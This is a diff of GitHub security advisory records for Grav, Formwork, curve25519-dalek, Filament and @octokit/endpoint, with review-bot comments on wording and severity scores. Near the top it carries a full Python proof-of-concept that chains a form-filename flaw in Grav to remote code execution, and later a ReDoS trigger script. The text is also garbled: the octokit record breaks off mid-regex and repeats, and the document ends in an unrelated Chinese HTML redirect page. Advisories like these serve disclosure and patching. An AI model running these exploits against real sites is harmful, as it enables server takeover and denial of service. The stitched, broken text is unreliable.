Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. 
For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END 
################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = 
f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += 
f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] 
Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [
 {
 "package": {
@@ -49,9 +54,9 @@
 "CWE-287",
 "CWE-434"
 ],
- "severity": "CRITICAL",
+ "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2024-03-06T16:58:33Z",
- "nvd_published_at": null
+ "nvd_published_at": "2024-03-21T02:52:21Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json
index 29d2d42046096..6575c789053ec 100644
--- a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json
+++ b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5pxr-7m4j-jjc6",
- "modified": "2025-03-19T14:49:46Z",
+ "modified": "2026-02-18T23:46:36Z",
 "published": "2024-06-07T19:37:10Z",
 "aliases": [
 "CVE-2024-37160"
 ],
 "summary": "Cross-site scripting (XSS) vulnerability in Description metadata",
- "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).\n\n### PoC\n1. Log in with an Administrator user account.\n2. Navigate to /panel/options/site/.\n3. 
Inject the JS script by adding to the description field.\n4. Simulate a victim who is not a site member visiting the website. You will notice that the JS script executes on every page they vis\n\n![image](https://github.com/getformwork/formwork/assets/170840940/1c40be24-3367-4c80-bb44-9db64ef88970)\n![image](https://github.com/getformwork/formwork/assets/170840940/68dd5bff-9db1-441b-a3b3-a0c014565f59)\n![image](https://github.com/getformwork/formwork/assets/170840940/3cd84c39-9b44-49d0-8b6a-6c8aeda7e49f)\n![image](https://github.com/getformwork/formwork/assets/170840940/f45afd87-80e9-4cf1-8121-bb4e121849c9)", + "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). 
In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).",
 "severity": [
 {
 "type": "CVSS_V3",
diff --git a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json
index e74db3d61a505..2ddc41e7c50d2 100644
--- a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json
+++ b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json
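Review bot: The rewritten `details` string still carries the ungrammatical sentence under `### Details`, `An attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site.`, and the `### Summary` paragraph opens with a subject-less fragment, `an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website.` Since this commit already rewrites that line to drop the PoC steps and screenshots, it is the natural moment to fix the wording, for example `An attacker with administrator privileges can execute arbitrary web scripts by modifying site options via /panel/options/site.` and `The Description metadata field is affected by a Stored XSS vulnerability that affects all pages of the website.` Both are wording-only changes; the stated facts, links and commit hash stay as they are.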
@@ -1,14 +1,19 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x4gp-pqpj-f43q",
- "modified": "2025-07-28T15:46:43Z",
+ "modified": "2026-02-17T19:30:26Z",
 "published": "2024-06-18T21:56:24Z",
 "aliases": [
 "CVE-2024-58262"
 ],
 "summary": "curve25519-dalek has timing variability in `curve25519-dalek`'s `Scalar29::sub`/`Scalar52::sub`",
 "details": "Timing variability of any kind is problematic when working with potentially secret values such as elliptic curve scalars, and such issues can potentially leak private keys and other secrets. Such a problem was recently discovered in `curve25519-dalek`.\n\nThe `Scalar29::sub` (32-bit) and `Scalar52::sub` (64-bit) functions contained usage of a mask value inside a loop where LLVM saw an opportunity to insert a branch instruction (`jns` on x86) to conditionally bypass this code section when the mask value is set to zero as can be seen in godbolt:\n\n- 32-bit (see L106): https://godbolt.org/z/zvaWxzvqv\n- 64-bit (see L48): https://godbolt.org/z/PczYj7Pda\n\nA similar problem was recently discovered in the Kyber reference implementation:\n\nhttps://groups.google.com/a/list.nist.gov/g/pqc-forum/c/hqbtIGFKIpU/m/cnE3pbueBgAJ\n\nAs discussed on that thread, one portable solution, which is also used in this PR, is to introduce a volatile read as an optimization barrier, which prevents the compiler from optimizing it away.\n\nThe fix can be validated in godbolt here:\n\n- 32-bit: https://godbolt.org/z/jc9j7eb8E\n- 64-bit: https://godbolt.org/z/x8d46Yfah\n\nThe problem was discovered and the solution independently verified by Alexander Wagner and Lea Themint using their DATA tool:\n\nhttps://github.com/Fraunhofer-AISEC/DATA",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
 "affected": [
 {
 "package": {
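Review bot: The added CVSS vector `CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N` rates the timing leak as locally exploitable with only limited confidentiality impact, while the unchanged `details` text in the same hunk says the issue "can potentially leak private keys and other secrets", which would ordinarily be scored `C:H`. If the LOW rating (the second hunk, `@@ -56,7 +61,7 @@`, changes `severity` from `MODERATE` to `LOW` to match this vector) reflects a judgment that the branch is only observable by a co-located attacker and that recovering a full key from it is impractical, that reasoning is not recorded anywhere in the record. A sentence in `details` or a reference pointing at the scoring rationale would let downstream consumers of the database understand the downgrade. Whether `AV:L` is the right choice for a library that backs network protocols is a judgment call I cannot settle from this file alone.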
@@ -56,7 +61,7 @@
 "cwe_ids": [
 "CWE-203"
 ],
- "severity": "MODERATE",
+ "severity": "LOW",
 "github_reviewed": true,
 "github_reviewed_at": "2024-06-18T21:56:24Z",
 "nvd_published_at": null
diff --git a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json
index 017745cd2c54d..39731d5869690 100644
--- a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json
+++ b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json
@@ -1,14 +1,19 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9h9q-qhxg-89xr",
- "modified": "2024-10-23T17:40:43Z",
+ "modified": "2026-02-17T19:41:13Z",
 "published": "2024-09-27T20:51:01Z",
 "aliases": [
 "CVE-2024-47186"
 ],
 "summary": "Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting",
 "details": "### Summary\n\nIf values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to XSS attack against a user who opens a page on which a color column or entry is rendered.\n\nVersions of Filament from v3.0.0 through v3.2.114 are affected.\n\nPlease upgrade to Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115).\n\n### PoC\n\nFor example, using a value such as:\n\n```html\nblue;\"> $state,\n])>\n```\n\nSince Laravel does not escape special characters within the `@style` Blade directive, the effective output HTML would be:\n\n```html\n
\n```\n\nCreating the opportunity for arbitrary JS to run if it was stored in the database.\n\n### Response\n\nThis vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.\n\nThe review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed to escape any special characters while outputting inline styles like this:\n\n```blade\n
$state,\n])>
\n```\n\nAlthough these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
 "affected": [
 {
 "package": {
@@ -71,7 +76,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": "CRITICAL",
+ "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2024-09-27T20:51:01Z",
 "nvd_published_at": "2024-09-27T21:15:03Z"
diff --git a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json
index 280d5caae63c8..ae9c28bfdeebc 100644
--- a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json
+++ b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-76p7-773f-r4q5",
- "modified": "2026-01-29T12:30:25Z",
+ "modified": "2026-02-17T03:30:15Z",
 "published": "2025-02-10T18:30:47Z",
 "aliases": [
 "CVE-2024-11831"
@@ -64,6 +64,10 @@
 "type": "WEB",
 "url": "https://access.redhat.com/security/cve/CVE-2024-11831"
 },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2026:2769"
+ },
 {
 "type": "WEB",
 "url": "https://access.redhat.com/errata/RHSA-2026:1536"
diff --git a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json
index b83b5f4fb7e45..113ac1a613404 100644
--- a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json
+++ b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x4c5-c7rf-jjgv",
- "modified": "2025-02-14T22:19:51Z",
+ "modified": "2026-02-17T16:11:00Z",
 "published": "2025-02-14T17:56:18Z",
 "aliases": [
 "CVE-2025-25285"
 ],
 "summary": "@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking",
- "details": "### Summary\nBy crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.\n\n### Details\nThe issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:\n```ts\nheaders.accept.match(/[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\nThe regular expression `/[\\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.\ne.g., the attack string: \n```js\n\"\" + \"A\".repeat(100000) + \"-\"\n```\n\n### PoC\n[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)\nHere is the reproduction process for the vulnerability:\n1. run 'npm i @octokit/endpoint'\n2. Move `poc.js` to the root directory of the same level as `README.md`\n3. run 'node poc.js'\nresult:\n4. 
then the program will stuck forever with high CPU usage\n```js\nimport { endpoint } from \"@octokit/endpoint\";\n// import { parse } from \"./node_modules/@octokit/endpoint/dist-src/parse.js\";\nconst options = { \n method: \"POST\",\n url: \"/graphql\", // Ensure that the URL ends with \"/graphql\"\n headers: {\n accept: \"\" + \"A\".repeat(100000) + \"-\", // Pass in the attack string\n \"content-type\": \"text/plain\",\n },\n mediaType: {\n previews: [\"test-preview\"], // Ensure that mediaType.previews exists and has values\n format: \"raw\", // Optional media format\n },\n baseUrl: \"https://api.github.com\",\n};\n\nconst startTime = performance.now();\nendpoint.parse(options);\nconst endTime = performance.now();\nconst duration = endTime - startTime;\nconsole.log(`Endpoint execution time: ${duration} ms`);\n```\n1. **Import the `endpoint` module**: First, import the `endpoint` module from the npm package `@octokit/endpoint`, which is used for handling GitHub API requests.\n\n2. **Construct the `options` object that triggers a ReDoS attack**: The following member variables are critical in constructing the `options` object:\n- `url`: Set to `\"/graphql\"`, ensuring the URL ends with `/graphql` to match the format for GitHub's GraphQL API.\n- `headers`:\n> `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. 
When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint package`, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. 
The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(? `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. 
This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint` package, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(?\") into the Role=User parameter in the /panel/users/{name}/profile page, which is the user profile update page.\nDoing this will change the users data in a way that prevents users and then the entire site from loading. 
Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\n\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.\n\n### PoC\n\n![2025-02-27_10-25](https://github.com/user-attachments/assets/4b5a2d71-3397-4a5b-8464-35752376115a)\n\n1. Intercept the request and inject an input that will trigger an error.\n\n![2025-02-27_10-25_1](https://github.com/user-attachments/assets/a888c109-a724-4478-ae80-d9e8b05ef1aa)\n\n![image](https://github.com/user-attachments/assets/e81bb9fc-8c92-413c-8cc0-0bcffd2e2922)\n\n2.After that, it will be observed that the system is shut down or completely broken. Even changing the browser or resetting the server will not be able to restore it.", + "details": "### Summary\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\nThe attack involves injecting any invalid user role value. Doing this will change the users data in a way that prevents users and then the entire site from loading. 
Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.",
 "severity": [
 {
 "type": "CVSS_V3",
diff --git a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json
index b09f8f6bf94da..e0a593b17c8f7 100644
--- a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json
+++ b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json
@@ -1,11 +1,11 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vf6x-59hh-332f",
- "modified": "2025-03-17T20:27:03Z",
+ "modified": "2026-02-18T23:47:22Z",
 "published": "2025-03-01T00:11:46Z",
 "aliases": [],
 "summary": " Formwork has a cross-site scripting (XSS) vulnerability in Site title",
- "details": "### Summary\n\nThe site title field at /panel/options/site/allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users.\n\n### Impact\n\nThe attack is widespread, leveraging what XSS can do. This will undoubtedly impact system availability.\n\n### Patches\n- [**Formwork 2.x** (aa3e9c6)](https://github.com/getformwork/formwork/commit/aa3e9c684035d9e8495169fde7c57d97faa3f9a2) escapes site title from panel header navigation.\n\n### Details\n\nBy embedding \"\n \n\n \n\n\n\n
\n \n
\n \n \n

正在为您跳转

\n

我们正在将您引导至 Google。
如果页面没有自动刷新,请点击下方的按钮。

\n \n \n 立即前往 Google\n
